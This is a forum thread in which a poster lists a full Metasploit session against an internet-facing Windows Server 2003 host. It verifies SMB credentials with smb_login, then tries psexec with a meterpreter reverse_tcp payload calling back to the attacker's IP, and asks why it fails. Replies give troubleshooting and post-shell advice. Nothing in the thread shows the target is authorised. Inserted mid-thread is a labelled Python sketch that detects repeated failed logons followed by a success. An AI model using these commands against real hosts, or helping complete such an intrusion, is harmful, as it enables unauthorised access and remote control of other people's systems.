mbarakoda

Can You Let Me Know What Is The Problem With This Exploit?

4 posts in this topic

Target OS: Windows 2003 SP2 EN

Target public IP: XX.XX.XX.XX

Target open port: 445

My OS: Windows 7

My public IP: YY.YY.YY.YY

My local IP: 192.168.2.42

My router: SMC

Because the target is not on the same LAN and the attack will be over the internet, I started by setting up port forwarding in the router settings as follows:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed Metasploit and started by checking whether the credentials are valid by running scanner/smb/smb_login as follows:

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Then, after the login was successful, I tried to use exploit/windows/smb/psexec to exploit the server as follows:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

But as you can see, the exploit failed although the credentials are valid and confirmed above. Can you help me understand what's wrong with the above?

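Seen from the server side, the smb_login run in the post above (two failed attempts for one account, then a success from the same address) leaves a recognisable trail in the Security log. The following detection sketch is an added example, not part of the original thread: the event records are constructed, the field names (`ts`, `src_ip`, `logon_type`) are assumptions about how the log was exported, and 529/540 are the Windows Server 2003 event IDs for a failed logon and a successful network logon.

```python
from collections import defaultdict

# Windows Server 2003 Security log event IDs (pre-Vista numbering).
FAILED_LOGON = 529       # unknown user name or bad password
NETWORK_LOGON_OK = 540   # successful network logon
NETWORK = 3              # logon type 3 = network (e.g. SMB)

def guess_then_success(events, min_failures=2, window_s=300):
    """Return (source_ip, user, failures) for every network logon success
    that follows >= min_failures failed network logons for the same user
    from the same source within window_s seconds."""
    failures = defaultdict(list)   # (ip, user) -> timestamps of failures
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["logon_type"] != NETWORK:
            continue
        key = (ev["src_ip"], ev["user"].lower())
        if ev["event_id"] == FAILED_LOGON:
            failures[key].append(ev["ts"])
        elif ev["event_id"] == NETWORK_LOGON_OK:
            recent = [t for t in failures[key] if ev["ts"] - t <= window_s]
            if len(recent) >= min_failures:
                hits.append((key[0], key[1], len(recent)))
            failures[key].clear()   # a success resets the streak
    return hits

# Constructed sample records (not taken from the post); addresses come from
# the documentation ranges 203.0.113.0/24 and 198.51.100.0/24.
SAMPLE = [
    {"ts": 100, "event_id": 529, "logon_type": 3, "src_ip": "203.0.113.7", "user": "root"},
    {"ts": 101, "event_id": 529, "logon_type": 3, "src_ip": "203.0.113.7", "user": "root"},
    {"ts": 102, "event_id": 540, "logon_type": 3, "src_ip": "203.0.113.7", "user": "root"},
    # One mistyped password followed by a success: below the threshold.
    {"ts": 200, "event_id": 529, "logon_type": 3, "src_ip": "198.51.100.9", "user": "alice"},
    {"ts": 230, "event_id": 540, "logon_type": 3, "src_ip": "198.51.100.9", "user": "alice"},
    # Interactive console failure (logon type 2): ignored by this check.
    {"ts": 300, "event_id": 529, "logon_type": 2, "src_ip": "", "user": "admin"},
]

if __name__ == "__main__":
    for ip, user, n in guess_then_success(SAMPLE):
        print(f"{ip}: {n} failed network logons for '{user}', then a success")
```

The transcript also shows the two conditions that make this pattern possible in the first place: TCP 445 reachable from the internet and guest sessions accepted with any credentials. Closing both removes the exposure the check watches for.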

It could be that the vulnerability is already patched.

[-] Handler failed to bind to YY.YY.YY.YY:4444

What's running locally already on 4444?

Also, what OS is the target? Windows, or Linux running SMB? User root on a Windows box seems unlikely, whereas I could see it on a Linux machine running Samba, which, if you think about it, I don't think psexec works on Linux as a payload, but I could be wrong.

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.


I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
